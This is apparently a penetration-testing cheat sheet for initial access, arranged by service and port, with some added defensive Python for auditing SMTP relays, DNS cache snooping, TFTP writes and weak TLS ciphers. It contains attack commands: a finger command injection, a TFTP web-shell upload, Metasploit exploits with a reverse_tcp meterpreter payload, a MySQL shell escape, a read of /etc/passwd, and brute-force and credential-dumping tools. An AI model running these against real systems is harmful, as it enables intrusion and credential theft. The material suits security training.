After finding your target and enumerating it, it's now time for initial access. This step usually focuses on exploiting a port/service that is open to you. There are tons of different ways to do this, as you can see from the guides and list below.
Keep in mind that just because you cannot fully exploit one service does not mean it won't be helpful. Certain services may hold interesting intel that helps you exploit something else, such as an open FTP server with anonymous auth that contains a few documents with valid usernames in them (you will find worse things).
Once you have your initial foothold, you will essentially attempt a second round of the same process to escalate your privileges on the target box. Sometimes that can be done by getting initial access on another trusted box, or even via a service that is running internally on the loopback interface. Check everything, look everywhere, and don't forget the OSCP catch phrase: "try harder!"
CAT (Cisco Auditing Tool) - Perl script which scans Cisco routers for common vulnerabilities.
# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst
25 - SMTP
HELO - Identifies the client to the server (the basic SMTP greeting).
EHLO - Extended SMTP.
STARTTLS - SMTP is communicated over an unencrypted protocol; by starting a TLS session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify whether the email user's mailbox exists.
telnet $ip 25
EHLO root
MAIL FROM:root@target.com
RCPT TO:example@gmail.com
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT
swaks (Swiss Army Knife SMTP) is a command-line tool written in Perl for testing SMTP setups; it supports STARTTLS and SMTP AUTH (PLAIN, LOGIN, CRAM-MD5, SPA, and DIGEST-MD5). swaks allows you to stop the SMTP dialog at any stage, e.g. to check RCPT TO: without actually sending a mail.
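The telnet session above is exactly what a mail administrator should replay against their own server to confirm it is not an open relay. The following Python script is an added example (not part of the original notes or of swaks): it walks a captured client/server dialog and flags the two outcomes that matter, a 250 to RCPT TO for a foreign domain from an unauthenticated client, and a 250 to VRFY. The LOCAL_DOMAINS and RELAY_NETS policy and the SAMPLE_TRANSCRIPT (the session above with server replies added) are constructed assumptions.

```python
import re
from ipaddress import ip_address, ip_network
from typing import List

# Assumed relay policy for the server under audit (not from the original page):
LOCAL_DOMAINS = {"target.com"}                  # domains this server accepts inbound mail for
RELAY_NETS = [ip_network("10.0.0.0/8")]         # client networks allowed to relay outbound

# Constructed dialog in the shape of the telnet session above, with server replies added.
SAMPLE_TRANSCRIPT = """\
S: 220 mail.target.com ESMTP
C: EHLO root
S: 250-mail.target.com
S: 250 VRFY
C: VRFY root
S: 250 root <root@target.com>
C: MAIL FROM:root@target.com
S: 250 OK
C: RCPT TO:example@gmail.com
S: 250 OK
C: DATA
S: 354 End data with <CR><LF>.<CR><LF>
C: Subject: Testing open mail relay.
C: Testing SMTP open mail relay. Have a nice day.
C: .
S: 250 OK queued
C: QUIT
S: 221 Bye
"""

_ADDR_RE = re.compile(r"<?([^<>\s]+)@([^<>\s]+?)>?\s*$")


def _recipient_domain(rcpt_cmd: str) -> str:
    """Domain part of an 'RCPT TO:<user@domain>' command, lower-cased ('' if unparsable)."""
    match = _ADDR_RE.search(rcpt_cmd.split(":", 1)[1]) if ":" in rcpt_cmd else None
    return match.group(2).lower() if match else ""


def _client_may_relay(client_ip: str) -> bool:
    return any(ip_address(client_ip) in net for net in RELAY_NETS)


def audit_smtp_transcript(transcript: str, client_ip: str) -> List[str]:
    """Walk a captured 'C:'/'S:' dialog and report two policy failures:
    a 250 to RCPT TO for a foreign domain from an unauthenticated, untrusted
    client (open relay), and a 250 to VRFY (confirms a mailbox exists).
    A 252 to VRFY is the non-committal reply and is not flagged."""
    findings: List[str] = []
    pending = ""            # last client command, awaiting the server's reply
    authenticated = False
    for raw in transcript.splitlines():
        line = raw.strip()
        if line.startswith("C:"):
            pending = line[2:].strip()
            continue
        if not line.startswith("S:"):
            continue
        code = line[2:].strip()[:3]
        verb = pending.split(":", 1)[0].split(" ", 1)[0].upper()
        if verb == "AUTH" and code == "235":
            authenticated = True
        elif verb == "VRFY" and code == "250":
            findings.append(f"VRFY confirmed a mailbox ('{pending}'): user enumeration possible")
        elif verb == "RCPT" and code == "250":
            domain = _recipient_domain(pending)
            if domain not in LOCAL_DOMAINS and not authenticated and not _client_may_relay(client_ip):
                findings.append(f"open relay: accepted '{pending}' from unauthenticated client {client_ip}")
    return findings


if __name__ == "__main__":
    for finding in audit_smtp_transcript(SAMPLE_TRANSCRIPT, "203.0.113.5"):
        print(finding)
```

The same transcript from a client inside RELAY_NETS, or preceded by a successful AUTH (235), produces no relay finding, which is the behaviour a correctly configured MTA should show; only the VRFY line remains, and the fix for that is disabling VRFY or returning 252.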
47/1723 - PPTP
Point-to-Point Tunneling Protocol provides remote (VPN) access for mobile devices; it uses TCP port 1723 for the control channel and key exchange, and IP protocol 47 (GRE) to carry the encrypted tunneled data between peers.
DNS Cache Snooping - You can use the simple 'dig' command to explore what is saved in the target's DNS cache. Make sure you make these requests non-recursively so you do not contaminate the current cache.
Hacking: The Next Generation - DNS Cache Snooping, pg. 86
#dig @targetserver.example.com testdomain.com A +norecurse
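What `+norecurse` actually changes is one bit in the DNS header (RD, "recursion desired"). The following Python code is an added example, not from the original notes: it builds and parses a minimal query so the bit is visible, and shows the resolver-side policy that stops cache snooping in the first place, answering only internal clients. INTERNAL_NETS and the query names are constructed assumptions.

```python
import struct
from ipaddress import ip_address, ip_network
from typing import Dict

# Assumed: the networks this resolver is meant to serve (not from the original page).
INTERNAL_NETS = [ip_network("192.168.0.0/16"), ip_network("10.0.0.0/8")]


def build_query(qname: str, qtype: int = 1, recursion_desired: bool = True, txid: int = 0x1234) -> bytes:
    """Encode a minimal DNS query: 12-byte header plus one question (RFC 1035).
    recursion_desired=False clears the RD bit, which is what `dig +norecurse` sends."""
    flags = 0x0100 if recursion_desired else 0x0000     # RD is bit 8 of the flags word
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    labels = qname.rstrip(".").split(".")
    question = b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"
    return header + question + struct.pack("!HH", qtype, 1)   # QTYPE, QCLASS=IN


def parse_query(data: bytes) -> Dict[str, object]:
    """Decode the header flags and the first question of a DNS packet."""
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if qdcount != 1:
        raise ValueError(f"expected exactly one question, got {qdcount}")
    labels, pos = [], 12
    while True:
        length = data[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name is not supported")
        labels.append(data[pos:pos + length].decode("ascii"))
        pos += length
    qtype, _qclass = struct.unpack("!HH", data[pos:pos + 4])
    return {
        "txid": txid,
        "qr": bool(flags & 0x8000),          # 0 = query, 1 = response
        "opcode": (flags >> 11) & 0xF,
        "rd": bool(flags & 0x0100),          # recursion desired
        "qname": ".".join(labels),
        "qtype": qtype,
    }


def resolver_policy(query: Dict[str, object], client_ip: str) -> str:
    """How a closed recursive resolver should treat the query. Only internal
    clients get answers at all; a non-recursive query from outside is the
    signature of a cache-snooping probe and is worth logging separately."""
    if any(ip_address(client_ip) in net for net in INTERNAL_NETS):
        return "serve"
    if not query["rd"]:
        return f"refuse: non-recursive query for {query['qname']} from {client_ip} (cache snooping probe)"
    return f"refuse: recursion for {client_ip} is not permitted (closed resolver)"


if __name__ == "__main__":
    probe = parse_query(build_query("testdomain.com", recursion_desired=False))
    print(probe)
    print(resolver_policy(probe, "203.0.113.9"))
```

A resolver that answers non-recursive queries for anyone leaks its cache contents by design; the mitigation is the allow-list above (or the equivalent `allow-query`/`allow-recursion` settings in the resolver's own configuration), not filtering on the RD bit alone.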
69 - TFTP
tftp [target] PUT local_file
tftp [target] GET example.txt
If unauthenticated access is allowed with write permissions, you can upload a shell:
$ tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
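The session above succeeds because the daemon accepted a WRQ (write request) from an unauthenticated client. The following Python code is an added example, not from the original notes or from any tftpd implementation: it decodes the RFC 1350 request packet that `put`/`get` send, and applies the two server-side checks that would have refused the upload, a read-only default and rejection of paths that escape the TFTP root. `build_request` only exists to construct sample packets offline.

```python
import posixpath
import struct
from typing import Dict

OPCODES = {1: "RRQ", 2: "WRQ"}


def build_request(opcode: int, filename: str, mode: str = "octet") -> bytes:
    """Encode a TFTP read/write request (RFC 1350): 2-byte opcode, then
    NUL-terminated filename and transfer mode. Used here to build test packets."""
    return struct.pack("!H", opcode) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


def parse_request(data: bytes) -> Dict[str, str]:
    """Decode an RRQ/WRQ packet into its opcode name, filename and mode."""
    if len(data) < 4:
        raise ValueError("packet too short")
    (opcode,) = struct.unpack("!H", data[:2])
    if opcode not in OPCODES:
        raise ValueError(f"not a request packet (opcode {opcode})")
    fields = data[2:].split(b"\x00")
    if len(fields) < 3:   # filename, mode, and the empty tail after the final NUL
        raise ValueError("malformed request: missing NUL terminator")
    return {
        "op": OPCODES[opcode],
        "filename": fields[0].decode(errors="replace"),
        "mode": fields[1].decode(errors="replace").lower(),
    }


def authorize(req: Dict[str, str], allow_write: bool = False) -> str:
    """Server-side policy: reject absolute paths and '..' traversal, reject
    unknown transfer modes, and reject writes unless the daemon was started
    with writes explicitly enabled. Returns 'allow' or 'deny: <reason>'."""
    name = req["filename"]
    norm = posixpath.normpath(name)
    if posixpath.isabs(name) or norm == ".." or norm.startswith("../"):
        return f"deny: path escapes TFTP root ({name!r})"
    if req["mode"] not in ("octet", "netascii"):
        return f"deny: unsupported mode {req['mode']!r}"
    if req["op"] == "WRQ" and not allow_write:
        return f"deny: write of {name!r} refused, server is read-only"
    return "allow"


if __name__ == "__main__":
    # The 'put shell.php' from the session above, as the server sees it on the wire.
    packet = build_request(2, "shell.php")
    print(packet)
    print(authorize(parse_request(packet)))
```

A TFTP server that is needed for PXE or device firmware normally only has to serve reads; keeping writes disabled, and serving from a dedicated directory, removes the upload path entirely.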
79 - Finger
#finger username@domain.com
$ finger-user-enum.pl -U users.txt -t $ip
#finger "/bin/ls -a /@domain.com"
80/443 - Web
Open a connection
$ openssl s_client -connect $ip:443
Basic SSL ciphers check
$ nmap --script ssl-enum-ciphers -p 443 $ip
Look for unsafe ciphers such as Triple-DES and Blowfish
A very complete tool for SSL/TLS auditing is testssl.sh, which finds BEAST, FREAK, POODLE, Heartbleed, etc.
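The `ssl-enum-ciphers` output has to be read suite by suite to spot the weak ones. The following Python code is an added example, not from the original notes, nmap or testssl.sh: it parses output in the shape nmap prints and flags deprecated protocol versions and cipher suites with known-weak components (Triple-DES, single DES, RC4, NULL, export-grade, MD5 MACs, anonymous key exchange) by name, understanding both IANA-style names (TLS_RSA_WITH_3DES_EDE_CBC_SHA) and OpenSSL-style names (DES-CBC3-SHA) as printed by `openssl s_client`. SAMPLE_NMAP_OUTPUT is constructed, not a real scan.

```python
import re
from typing import Dict, List

# Constructed sample in the shape of `nmap --script ssl-enum-ciphers` output (not a real scan).
SAMPLE_NMAP_OUTPUT = """\
| ssl-enum-ciphers:
|   TLSv1.0:
|     ciphers:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C
|       TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
|       TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
|_  least strength: C
"""

WEAK_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}

# (substring of the upper-cased suite name, reason it is unsafe)
WEAK_MARKERS = [
    ("3DES", "Triple-DES (64-bit block, Sweet32)"),
    ("DES-CBC3", "Triple-DES (64-bit block, Sweet32)"),
    ("RC4", "RC4 stream cipher"),
    ("NULL", "no encryption"),
    ("EXPORT", "export-grade key length"),
    ("_MD5", "MD5-based MAC"),
    ("-MD5", "MD5-based MAC"),
    ("_DH_ANON_", "anonymous key exchange, no authentication"),
    ("ADH-", "anonymous key exchange, no authentication"),
]

_PROTO_RE = re.compile(r"^\|\s+(SSLv\d|TLSv1\.\d):")
_SUITE_RE = re.compile(r"\b(TLS_[A-Z0-9_]+|[A-Z0-9]+(?:-[A-Z0-9]+)+)\b")
# single DES: 'DES_CBC_SHA' / 'DES-CBC-SHA' not preceded by '3' (which would be Triple-DES)
_SINGLE_DES_RE = re.compile(r"(?<![0-9A-Z])DES[_-]CBC[_-]SHA")


def classify_suite(name: str) -> List[str]:
    """Return the reasons a cipher suite is unsafe (empty list if none found by name)."""
    upper = name.upper()
    reasons = [why for marker, why in WEAK_MARKERS if marker in upper]
    if _SINGLE_DES_RE.search(upper):
        reasons.append("single DES (56-bit key)")
    return reasons


def audit_nmap_output(text: str) -> Dict[str, List[str]]:
    """Parse ssl-enum-ciphers style output and map each weak protocol version
    or cipher suite to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for line in text.splitlines():
        proto = _PROTO_RE.match(line)
        if proto:
            if proto.group(1) in WEAK_PROTOCOLS:
                findings[proto.group(1)] = [f"deprecated protocol version {proto.group(1)}"]
            continue
        suite = _SUITE_RE.search(line)
        if suite:
            reasons = classify_suite(suite.group(1))
            if reasons:
                findings[suite.group(1)] = reasons
    return findings


if __name__ == "__main__":
    for item, reasons in audit_nmap_output(SAMPLE_NMAP_OUTPUT).items():
        print(f"{item}: {', '.join(reasons)}")
```

Classification by name catches the obvious offenders but says nothing about key sizes, certificate problems or protocol-level bugs such as Heartbleed; that is the gap testssl.sh fills, so treat this as a quick triage filter on scan output rather than a replacement for a full audit.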
ident-user-enum - A simple Perl script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system.
# Endpoint Mapper Service Discovery
use auxiliary/scanner/dcerpc/endpoint_mapper
#Hidden DCERPC Service Discovery
use auxiliary/scanner/dcerpc/hidden
# Remote Management Interface Discovery
use auxiliary/scanner/dcerpc/management
# DCERPC TCP Service Auditor
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
msf > use exploit/windows/dcerpc/ms03_026_dcom
SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see on the network and reports whether each file can be read and/or written. All findings are streamed out to a CSV file, an Elasticsearch host, or both.
smbexec.py: A similar approach to PSEXEC without using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.
atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require installing any service/agent on the target server. Runs as Administrator. Highly stealthy.
dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
smbclient.py: A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It's an excellent example to see how to use impacket.smb in action.
addcomputer.py: Allows adding a computer to a domain using LDAP or SAMR (SMB).
getArch.py: This script will connect to a target machine (or list of targets) and gather the installed OS architecture type by (ab)using a documented MSRPC feature.
ifmap.py: This script will bind to the target's MGMT interface to get a list of interface IDs. It will use that list on top of another list of interface UUIDs seen in the wild, trying to bind to each interface, and reports whether the interface is listed and/or listening.
lookupsid.py: A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
netview.py: Gets a list of the sessions opened at the remote hosts and keeps track of them, looping over the hosts found and recording who logged in/out of the remote servers.
opdump.py: This binds to the given hostname:port and MSRPC interface. Then, it tries to call each of the first 256 operation numbers in turn and reports the outcome of each call.
reg.py: Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility.
rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
samrdump.py: An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
services.py: This script can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change.
Metasploit
Version
msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run
MultiExploit
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
Brute-force the community string to find SNMP services.
onesixtyone - onesixtyone is a simple SNMP scanner which sends SNMP requests for the sysDescr value asynchronously, with user-adjustable sending times, and then logs the responses, which give the description of the software running on the device.
LDAPmonitor - Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration
ldapdomaindump - Active Directory information dumper via LDAP
HEKATOMB - Hekatomb is a Python script that connects to an LDAP directory to retrieve all computer and user information. It then downloads all DPAPI blobs of all users from all computers and uses the domain backup keys to decrypt them.
oracsec - A simple utility that can be used to enumerate SIDs and carry out a simple username and password check against all known default usernames and passwords.
Oscanner - an Oracle assessment framework developed in Java.
This package contains the ODAT (Oracle Database Attacking Tool), an open source penetration testing tool that tests the security of Oracle Databases remotely.
thc-pptp-bruter - Brute force program against PPTP VPN endpoints (TCP port 1723). Fully standalone. Supports the latest MSChapV2 authentication. Tested against Windows and Cisco gateways. Exploits a weakness in Microsoft's anti-brute-force implementation which makes it possible to try 300 passwords per second.
1900 - SSDP (UDP)
evil-ssdp - This tool responds to SSDP multicast discover requests, posing as a generic UPNP device on a local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network.
mysql> create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Access passwords
mysql> use mysql
mysql> select user,password from user;
mysql> select user();
mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
mysql> \! cat /etc/passwd
mysql> \! bash
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
sqlsus is an open source MySQL injection and takeover tool, written in Perl. Via a command-line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database(s), and much more. Whenever relevant, sqlsus will mimic MySQL console output.
SipVicious - SIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password.